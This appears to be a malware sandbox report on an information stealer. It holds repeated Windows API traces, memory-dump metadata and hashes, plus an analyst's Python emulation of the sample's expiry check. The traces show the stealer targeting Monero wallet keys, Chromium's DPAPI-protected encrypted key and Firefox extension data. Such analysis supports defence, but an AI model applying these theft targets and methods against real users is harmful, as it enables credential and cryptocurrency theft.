                                        • Instruction ID: 89503bf2289dfd05c186966f7a5454d1638ba391f0146b7076c2b754f4a10313
                                        • Opcode Fuzzy Hash: 28dc1efa294c6e49fefd70e4a3eaf5a3ad44d50c697bde337823baee55a7177c
                                        • Instruction Fuzzy Hash: DD21E9B5D00218ABCF04EFE4E945AEEB7B9BF48301F04856AE406F3254EB345604CBA9
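The sequence at 0092696C to 009269DA (read the clock with GetSystemTime, parse a string with sscanf, convert two SYSTEMTIMEs to FILETIME, ExitProcess on one branch) has the shape of a built-in expiry check: the sample compares the current time with an embedded date and quits if it is past it. The listing shows the API sequence only, not the sscanf format string, the date itself, or which way the comparison goes. The emulation below is an added example for this report, not the sample's code: it assumes an ISO `YYYY-MM-DD` date and a "clock later than deadline means exit" direction, both of which are assumptions. The practical point for an analyst is the caveat it encodes: if the embedded date has passed, a sandbox run ends at ExitProcess before any stealer activity, and the fix is to set the VM clock before the deadline (or patch the branch), not to conclude the sample is inert.

```python
"""Emulation of the expiry check suggested by the GetSystemTime / sscanf /
SystemTimeToFileTime / ExitProcess sequence above.

Added example for this report; not the sample's code and not Joe Sandbox
output. Date format, comparison direction and the deadline string used in
the demo are assumptions: the listing shows the API calls, not their data.
"""
import re
from datetime import datetime, timezone
from typing import Tuple

# Windows FILETIME: 100-nanosecond ticks since 1601-01-01 00:00 UTC.
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
_TICKS_PER_SECOND = 10_000_000


def utc(year: int, month: int, day: int, hour: int = 0) -> datetime:
    """Small constructor for UTC instants (what GetSystemTime reports)."""
    return datetime(year, month, day, hour, tzinfo=timezone.utc)


def to_filetime(dt: datetime) -> int:
    """Equivalent of SystemTimeToFileTime for a timezone-aware datetime."""
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    delta = dt - _FILETIME_EPOCH
    seconds = delta.days * 86400 + delta.seconds
    return seconds * _TICKS_PER_SECOND + delta.microseconds * 10


def filetime_parts(ft: int) -> Tuple[int, int]:
    """(dwLowDateTime, dwHighDateTime): the two DWORDs 32-bit code actually compares."""
    return ft & 0xFFFFFFFF, (ft >> 32) & 0xFFFFFFFF


def parse_deadline(text: str) -> datetime:
    """Stand-in for the sscanf call. Assumed layout: YYYY-MM-DD (not shown in the listing)."""
    m = re.fullmatch(r"(\d{4})-(\d{2})-(\d{2})", text.strip())
    if not m:
        raise ValueError(f"deadline not in YYYY-MM-DD form: {text!r}")
    year, month, day = map(int, m.groups())
    return utc(year, month, day)


def is_expired(now: datetime, deadline_text: str) -> bool:
    """Assumed comparison: clock strictly past the deadline takes the ExitProcess branch."""
    return to_filetime(now) > to_filetime(parse_deadline(deadline_text))


def decide(now: datetime, deadline_text: str) -> str:
    """Which branch the emulated check takes for a given clock value."""
    return "ExitProcess" if is_expired(now, deadline_text) else "continue"


if __name__ == "__main__":
    DEADLINE = "2024-06-30"            # constructed value for the demo, not from the sample
    for clock in (utc(2024, 6, 1), utc(2024, 7, 1)):
        print(clock.date(), "->", decide(clock, DEADLINE))
```

Working in FILETIME rather than comparing dates directly mirrors what the binary does and makes the 64-bit split visible: on x86 the comparison is done on `dwHighDateTime` first and `dwLowDateTime` second, which is where a hand-patched branch or a wrong clock setting usually goes unnoticed.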
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927E37
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00927E3E
                                        • RegOpenKeyExA.ADVAPI32(80000002,006AC010,00000000,00020119,?), ref: 00927E5E
                                        • RegQueryValueExA.ADVAPI32(?,006BDB40,00000000,00000000,000000FF,000000FF), ref: 00927E7F
                                        • RegCloseKey.ADVAPI32(?), ref: 00927E92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: 2a0fdc2faeb053f67359fd937fb91fe8998e79c59007c20a6b9f75e1f27339b2
                                        • Instruction ID: db4c6e0b0dd9450350c8d5dd6f133c5436bcab6543940c24fee7fe17347aea8a
                                        • Opcode Fuzzy Hash: 2a0fdc2faeb053f67359fd937fb91fe8998e79c59007c20a6b9f75e1f27339b2
                                        • Instruction Fuzzy Hash: C7114FB1A44305EBD710CBD4ED59F7BBBB8FB48711F104259F605B7294DB7459008BA1
                                        APIs
                                        • StrStrA.SHLWAPI(006BDF78,?,?,?,0092140C,?,006BDF78,00000000), ref: 0092926C
                                        • lstrcpyn.KERNEL32(00B5AB88,006BDF78,006BDF78,?,0092140C,?,006BDF78), ref: 00929290
                                        • lstrlen.KERNEL32(?,?,0092140C,?,006BDF78), ref: 009292A7
                                        • wsprintfA.USER32 ref: 009292C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: a69b5294445f9139f3cb2ee1ac6d31f19a318c88e6d92cc1bc654bc6262017a8
                                        • Instruction ID: 1bd4c8c55f6e38a5b6827bbbce5b36cba1ba8e87c049f16526376608bef07574
                                        • Opcode Fuzzy Hash: a69b5294445f9139f3cb2ee1ac6d31f19a318c88e6d92cc1bc654bc6262017a8
                                        • Instruction Fuzzy Hash: 8801C075500209FFCB44DFDCD954EAD7BB9EB48355F108688F909A7204CA319A40DBD1
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009112B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009112BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009112D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009112F5
                                        • RegCloseKey.ADVAPI32(?), ref: 009112FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: d594193c30f83b0decbd129fcbd56c5433882c2b82f629a64baf943bdc8de83a
                                        • Instruction ID: c73693b10cc944d7baa358017896c01a83c6cdb6db2e5d5a446224ed03856242
                                        • Opcode Fuzzy Hash: d594193c30f83b0decbd129fcbd56c5433882c2b82f629a64baf943bdc8de83a
                                        • Instruction Fuzzy Hash: 0801C2B5A40308BBDB04DFD4DC59FAEB7B8EB48701F108195FA15A7280DA759A418F51
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String___crt$Type
                                        • String ID:
                                        • API String ID: 2109742289-3916222277
                                        • Opcode ID: c0efee04449af9041618741099a48fc1489bc6eca6766f11fece35e1ad79e1dc
                                        • Instruction ID: 55b3ec743e721ea61177737a339426037adebe0774c4c624a9cc791d441008ce
                                        • Opcode Fuzzy Hash: c0efee04449af9041618741099a48fc1489bc6eca6766f11fece35e1ad79e1dc
                                        • Instruction Fuzzy Hash: B441F5F51007AC5EDB218B249C84FFFBBECAF45704F1448E8E98A86186D2719A849F60
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00926663
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00926726
                                        • ExitProcess.KERNEL32 ref: 00926755
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00930E28,00000000,?), ref: 0092882F
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00928836
                                        • wsprintfA.USER32 ref: 00928850
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 1695172769-2206825331
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0092951E,00000000), ref: 00928D5B
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00928D62
                                        • wsprintfW.USER32 ref: 00928D78
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 769748085-2783943728
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,006BA330,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091A2E1
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 0091A3FF
                                        • lstrlen.KERNEL32(00000000), ref: 0091A6BC
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                        • DeleteFileA.KERNEL32(00000000), ref: 0091A743
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,006BA330,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091D481
                                        • lstrlen.KERNEL32(00000000), ref: 0091D698
                                        • lstrlen.KERNEL32(00000000), ref: 0091D6AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 0091D72B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,006BA330,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091D801
                                        • lstrlen.KERNEL32(00000000), ref: 0091D99F
                                        • lstrlen.KERNEL32(00000000), ref: 0091D9B3
                                        • DeleteFileA.KERNEL32(00000000), ref: 0091DA32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        APIs
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                                          • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                                          • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                                          • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                                          • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                                          • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                                          • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00931580,00930D92), ref: 0091F54C
                                        • lstrlen.KERNEL32(00000000), ref: 0091F56B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                        • API String ID: 998311485-3310892237
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID:
                                        • API String ID: 367037083-0
                                        • Opcode ID: 9eabab0a92522f543793ce0e732bc2b5eafb5a03c6d77cf3505b5ce6fd557f8b
                                        • Instruction ID: 6b09c2569dda0a415081951a5ba920d01bf0c4b8bce91b4d7ce8c2d9fc730400
                                        • Opcode Fuzzy Hash: 9eabab0a92522f543793ce0e732bc2b5eafb5a03c6d77cf3505b5ce6fd557f8b
                                        • Instruction Fuzzy Hash: FF414272D10119AFCB04EFA4E856BFEB778AF84304F00C418E41677255DB79AA09CFA6
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                                          • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                                          • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                                          • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                                          • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                                          • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                                          • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00919D39
                                          • Part of subcall function 00919AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919AEF
                                          • Part of subcall function 00919AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00914EEE,00000000,?), ref: 00919B01
                                          • Part of subcall function 00919AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919B2A
                                          • Part of subcall function 00919AC0: LocalFree.KERNEL32(?,?,?,?,00914EEE,00000000,?), ref: 00919B3F
                                          • Part of subcall function 00919B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00919B84
                                          • Part of subcall function 00919B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00919BA3
                                          • Part of subcall function 00919B60: LocalFree.KERNEL32(?), ref: 00919BD3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 2100535398-738592651
                                        • Opcode ID: 50d3a8c13769607d4daaf6ffec21175f000e4652a5a1280e7eb9dabae9decc72
                                        • Instruction ID: 0ed9e4f217e78fcc01e08c80395e90a18b51e0be14fe0dae4055085bd0bd5a5f
                                        • Opcode Fuzzy Hash: 50d3a8c13769607d4daaf6ffec21175f000e4652a5a1280e7eb9dabae9decc72
                                        • Instruction Fuzzy Hash: A63112B6E1010DABCB04DFE4DD95BEFB7B8AF88304F144519F915A7285EB309A44CBA1
                                        APIs
                                        • CreateFileA.KERNEL32(00923AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00923AEE,?), ref: 009292FC
                                        • GetFileSizeEx.KERNEL32(000000FF,00923AEE), ref: 00929319
                                        • CloseHandle.KERNEL32(000000FF), ref: 00929327
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
